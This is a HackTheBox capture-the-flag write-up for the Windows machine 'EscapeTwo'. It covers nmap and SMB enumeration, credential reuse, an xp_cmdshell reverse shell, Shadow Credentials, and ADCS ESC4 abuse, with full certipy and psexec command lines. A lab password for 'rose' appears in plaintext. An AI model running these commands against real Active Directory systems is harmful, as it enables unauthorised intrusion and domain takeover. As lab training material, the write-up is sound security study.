Box Info
  • Name:EscapeTwo
  • OS: Windows
  • Difficulty: Easy
  • IP: 10.10.11.51
EscapeTwo box image

Setup

mkdir -p ~/ctf/HackTheBox/escapetwo/scans; cd ~/ctf/HackTheBox/escapetwo

IP Address: 10.10.11.51

echo "10.10.11.51 escapetwo.htb" | sudo tee -a /etc/hosts

10.10.11.51 escapetwo.htb

Enumeration

nmap -sC -sV -Pn -p- escapetwo.htb -oN scans/nmap -vv nmap -sC -sV -p- -T5 -vv --min-rate 2500 -oN scans/nmap_2 escapetwo.htb

# nmap findings

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-04-28 07:17:36Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-27T21:35:48
| Not valid after:  2026-04-27T21:35:48
| MD5:   2346:52c8:2638:d62f:3774:8ca0:c934:df6a
| SHA-1: 0392:dac1:1784:2df8:1f92:1efa:c143:f3d7:4efd:52c1
|_ssl-date: 2025-04-28T07:19:11+00:00; -19m58s from scanner time.
445/tcp   open  microsoft-ds? syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-27T21:35:48
| Not valid after:  2026-04-27T21:35:48
| MD5:   2346:52c8:2638:d62f:3774:8ca0:c934:df6a
| SHA-1: 0392:dac1:1784:2df8:1f92:1efa:c143:f3d7:4efd:52c1
|_ssl-date: 2025-04-28T07:19:11+00:00; -19m58s from scanner time.
1433/tcp  open  ms-sql-s      syn-ack Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-27T13:41:16
| Not valid after:  2055-04-27T13:41:16
| MD5:   4fcb:5a4e:53c7:ee55:1d4c:7a61:9688:9040
| SHA-1: 3be5:b199:6a61:a7d8:e08e:92a0:0d5c:1ffb:eb3c:86f4
| ms-sql-info: 
|   10.10.11.51:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   10.10.11.51:1433: 
|     Target_Name: SEQUEL
|     NetBIOS_Domain_Name: SEQUEL
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: DC01.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
|_ssl-date: 2025-04-28T07:19:14+00:00; -19m58s from scanner time.
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-28T07:19:11+00:00; -19m58s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-27T21:35:48
| Not valid after:  2026-04-27T21:35:48
| MD5:   2346:52c8:2638:d62f:3774:8ca0:c934:df6a
| SHA-1: 0392:dac1:1784:2df8:1f92:1efa:c143:f3d7:4efd:52c1
3269/tcp  open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-28T07:19:11+00:00; -19m58s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-27T21:35:48
| Not valid after:  2026-04-27T21:35:48
| MD5:   2346:52c8:2638:d62f:3774:8ca0:c934:df6a
| SHA-1: 0392:dac1:1784:2df8:1f92:1efa:c143:f3d7:4efd:52c1
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49689/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         syn-ack Microsoft Windows RPC
49693/tcp open  msrpc         syn-ack Microsoft Windows RPC
49706/tcp open  msrpc         syn-ack Microsoft Windows RPC
49722/tcp open  msrpc         syn-ack Microsoft Windows RPC
49743/tcp open  msrpc         syn-ack Microsoft Windows RPC
49811/tcp open  msrpc         syn-ack Microsoft Windows RPC
62060/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: -19m58s, deviation: 0s, median: -19m58s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 62012/tcp): CLEAN (Timeout)
|   Check 2 (port 18505/tcp): CLEAN (Timeout)
|   Check 3 (port 20179/udp): CLEAN (Timeout)
|   Check 4 (port 46639/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2025-04-28T07:18:33
|_  start_date: N/A

cme smb escapetwo.htb -u 'rose' -p 'KxEPkKe6R8su' --users

# Enumerated users
ca_svc
rose
sql_svc
oscar
ryan
michael
krbtgt
Guest
Administrator

SMB Shares:

SMB         10.10.11.51     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.51     445    DC01             [+] sequel.htb\rose:KxE**************** 
SMB         10.10.11.51     445    DC01             [*] Enumerated shares
SMB         10.10.11.51     445    DC01             Share           Permissions     Remark
SMB         10.10.11.51     445    DC01             -----           -----------     ------
SMB         10.10.11.51     445    DC01             Accounting Department READ            
SMB         10.10.11.51     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.51     445    DC01             C$                              Default share
SMB         10.10.11.51     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.51     445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.51     445    DC01             SYSVOL          READ            Logon server share 
SMB         10.10.11.51     445    DC01             Users           READ

When tried opening these files in excel , there was an error showing File corrupt which led me to check the file type and found out these are Zip files

Unzipping these files, found a xml file with some credential table: Using these password found two more credentials:

oscar:86****************
sa:MS****************

Using these found out that sa is a MSSQL admin

Using this we use mssqlclient to enable enable_xp_cmdshell and get a reverse powershell:

in the SQL Configuration file found a password:

using password spray found this same password is used by user ryan as well:

using cme to enumerate service we find winrm to be enabled:

User Flag

Location: C:\Users\ryan\Desktop\user.txt | Flag:1a****************

Privilege Escalation

Using the obtained credentials for Ryan we run rusthound to collect info: We also try Kerberoasting but the hashes couldn’t be cracked using rockyou:

Then in bloodhound we find:

Shadow Credentials attack: A Shadow Credential Attack is a technique used by attackers to gain persistence and elevate privileges in a Windows Active Directory (AD) environment without creating obvious traces like new user accounts or group memberships. Instead, it abuses legitimate features—specifically Key Credential Link (KCL) attributes used in certificate-based authentication (e.g., PKINIT for Kerberos or Windows Hello for Business).

Pywhisker was used for this attack:

ca_svc:3b1****************

To check for any reusage of password we perform a hash spray against all usernames:

As the username ca_svc is for Certificate Publishers we use certipy to find vulnerabilities:

Using ADCS Exploitation Part 1: Common Attacks we can exploit the ESC4: certipy template -u ca_svc@sequel.htb -template DunderMifflinAuthentication -save-old -hashes 3b**************** -dc-ip 10.10.11.51

certipy req -username 'ca_svc@sequel.htb' -hashes 3b**************** -ca sequel-DC01-CA -target DC01.sequel.htb -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -upn administrator@sequel.htb

certipy auth -pfx administrator.pfx -dc-ip 10.10.11.51

Using Psexec we get a shell impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:7a8d4**************** -target-ip 10.10.11.51 administrator@sequel.htb

Root Flag

Location: c:\Users\Administrator\Desktop\root.txt | Flag: 85b****************